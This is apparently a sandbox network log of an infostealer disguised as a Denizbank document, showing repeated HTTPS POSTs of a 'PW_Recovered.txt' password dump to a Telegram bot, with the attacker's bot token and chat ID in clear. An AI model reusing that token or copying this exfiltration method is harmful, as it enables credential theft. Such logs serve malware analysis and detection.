2024-11-25 10:43:31 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 66 35 34 61 34 64 33 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd11f54a4d3e32Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:31 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:31 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 18 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:31 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 38 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 18","parameters":{"retry_after":18}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49843	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:33 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd123ed2feb5ea Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:33 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 33 65 64 32 66 65 62 35 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd123ed2feb5eaContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:33 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:33 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 16 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:33 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 36 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 16","parameters":{"retry_after":16}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49849	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:35 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd12d0c3219a48 Host: api.telegram.org Content-Length: 580
2024-11-25 10:43:35 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 64 30 63 33 32 31 39 61 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd12d0c3219a48Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:35 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:35 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 14 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:35 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 14","parameters":{"retry_after":14}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49855	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:37 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd135bb878f417 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:37 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 33 35 62 62 38 37 38 66 34 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd135bb878f417Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:38 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:37 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 12 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:38 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 32 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 12","parameters":{"retry_after":12}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49861	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:39 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd140d7a5ee1a3 Host: api.telegram.org Content-Length: 580
2024-11-25 10:43:39 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 30 64 37 61 35 65 65 31 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd140d7a5ee1a3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:40 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:39 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 10 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:40 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49866	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:41 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd14ac26879be1 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:41 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 61 63 32 36 38 37 39 62 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd14ac26879be1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:52 GMT Content-Type: application/json Content-Length: 525 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:52 UTC	525	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a Data Ascii: {"ok":true,"result":{"message_id":88,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531432,"document":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49892	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:53 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd182de5622be0 Host: api.telegram.org Content-Length: 580
2024-11-25 10:43:53 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 32 64 65 35 36 32 32 62 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd182de5622be0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:55 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:55 GMT Content-Type: application/json Content-Length: 525 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:55 UTC	525	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a Data Ascii: {"ok":true,"result":{"message_id":92,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531435,"document":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49900	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:57 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd193474f36c09 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:57 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 39 33 34 37 34 66 33 36 63 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd193474f36c09Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:44:03 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:44:03 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:44:03 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a Data Ascii: {"ok":true,"result":{"message_id":97,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531443,"document":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49917	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:44:05 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1b822ea7b891 Host: api.telegram.org Content-Length: 580
2024-11-25 10:44:05 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 62 38 32 32 65 61 37 62 38 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd1b822ea7b891Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
